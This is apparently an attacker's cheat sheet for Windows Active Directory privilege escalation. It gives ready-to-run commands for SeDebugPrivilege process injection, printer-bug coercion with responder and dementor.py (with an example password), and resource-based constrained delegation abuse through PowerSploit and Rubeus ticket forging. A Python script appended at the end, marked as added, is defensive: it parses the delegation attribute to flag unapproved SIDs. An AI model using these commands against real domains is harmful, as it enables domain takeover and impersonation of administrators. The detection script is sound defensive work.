Privilege Escalation

The adversary is trying to gain higher-level permissions. https://attack.mitre.org/tactics/TA0004/

Process Elevation (via SeDebugPrivilege)

If you run whoami /priv and see SeDebugPrivilege set to Enabled, you can treat the session as already being SYSTEM. One way to use it is decoder's psgetsys.ps1 script, once you have identified a suitable PID to inject into:

. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864, 'C:\temp\payload.exe');

You can also obtain an MSF session and use the module windows/manage/payload_inject with a PID of your choice.

Attacking spoolss ("The Printer Bug")

From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to coerce a TGT relay from the target host to us (running responder), which lets us generate a TGS for any user on that target host:

## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123

## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.local' 10.10.15.123 10.10.10.123

GenericWrite to Host + User SPN = PWN

If we have GenericWrite privileges over a host's computer object and we control a user that has an SPN, we can use PowerSploit to write a security descriptor containing our SID into the host's msDS-AllowedToActOnBehalfOfOtherIdentity property (resource-based constrained delegation) and then forge tickets to that host as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path

## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};

## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websrv.burmat.local /ptt;
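The Set-DomainObject call above stores the descriptor as the raw self-relative security descriptor value of msDS-AllowedToActOnBehalfOfOtherIdentity, and a defender pulling that attribute over LDAP gets the same bytes back. The following added example (not from the page or from PowerSploit) builds a constructed descriptor with the same SDDL layout as the page's "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SID)" string, then parses it back to list which SIDs have been granted delegation on a computer object and which of them are not on an approved allowlist; the SIDs and the element order inside the blob are assumptions, and the parser follows the header offsets so ordering does not matter.

```python
import struct

# Constructed sample values (not from the page): a Builtin\Administrators owner,
# which is what the page's "O:BA" SDDL prefix means, and one domain-user SID.
SAMPLE_OWNER = "S-1-5-32-544"
SAMPLE_ALLOWED = "S-1-5-21-1111111111-2222222222-3333333333-1105"
FULL_CONTROL = 0x000F01FF  # CCDCLCSWRPWPDTLOCRSDRCWDWO, the rights string used on the page

def sid_bytes(sid):
    """Encode 'S-1-5-21-...' into the binary SID layout stored in the descriptor."""
    parts = sid.split("-")
    rev, ident, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + ident.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def build_sd(owner_sid, allowed_sids, mask=FULL_CONTROL):
    """Self-relative SD with one ACCESS_ALLOWED ACE per SID (assumed element order: DACL, then owner)."""
    aces = b"".join(struct.pack("<BBHI", 0x00, 0x00, 8 + len(sid_bytes(s)), mask) + sid_bytes(s)
                    for s in allowed_sids)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    # header: revision 1, control = SE_DACL_PRESENT | SE_SELF_RELATIVE, DACL right after the 20-byte header
    header = struct.pack("<BBHIIII", 1, 0, 0x8004, 20 + len(acl), 0, 0, 20)
    return header + acl + sid_bytes(owner_sid)

def parse_sid(buf, off):
    """Decode a binary SID at offset off back into its S-1-... string form."""
    rev, n = struct.unpack_from("<BB", buf, off)
    ident = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % n, buf, off + 8)
    return "S-%d-%d" % (rev, ident) + "".join("-%d" % s for s in subs)

def delegation_grants(sd):
    """Return [(sid, access_mask)] for every ACCESS_ALLOWED ACE in the descriptor's DACL."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or off_dacl == 0:
        return []  # no DACL present: nothing is allowed to act on behalf of this object
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    grants, off = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE; object-type ACEs use another layout and are skipped
            grants.append((parse_sid(sd, off + 8), mask))
        off += ace_size
    return grants

def unexpected_delegators(sd, approved_sids):
    """SIDs granted delegation that are not on the approved allowlist; these warrant investigation."""
    return sorted(sid for sid, _ in delegation_grants(sd) if sid not in approved_sids)

SAMPLE_SD = build_sd(SAMPLE_OWNER, [SAMPLE_ALLOWED])
```

Feed the raw attribute bytes of each computer object into unexpected_delegators with the SIDs your change records approve; a user SID appearing there, as in this section, is the tell-tale of this technique.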
